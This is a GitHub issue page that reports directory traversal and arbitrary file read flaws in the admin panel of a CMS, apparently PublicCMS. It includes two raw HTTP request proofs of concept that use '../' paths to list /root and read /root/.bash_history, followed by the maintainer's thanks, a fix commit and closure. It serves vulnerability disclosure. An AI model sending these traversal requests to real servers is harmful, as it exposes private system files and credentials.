New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a "Directory Traversal" and "Arbitrary file read" vulnerability that can read system dir and file #12

Closed
jearyorg opened this Issue Jun 15, 2018 · 1 comment

Comments

2 participants
@jearyorg

jearyorg commented Jun 15, 2018

First you should login demo account,

Directory Traversal POC:

GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

Arbitrary file read POC:

GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close

You can use these two poc brower system dir and read any file~

@sanluan

This comment has been minimized.

Owner

sanluan commented Jun 20, 2018

4fe81a5
Thank you for finding this very serious problem

@sanluan sanluan closed this Jun 22, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment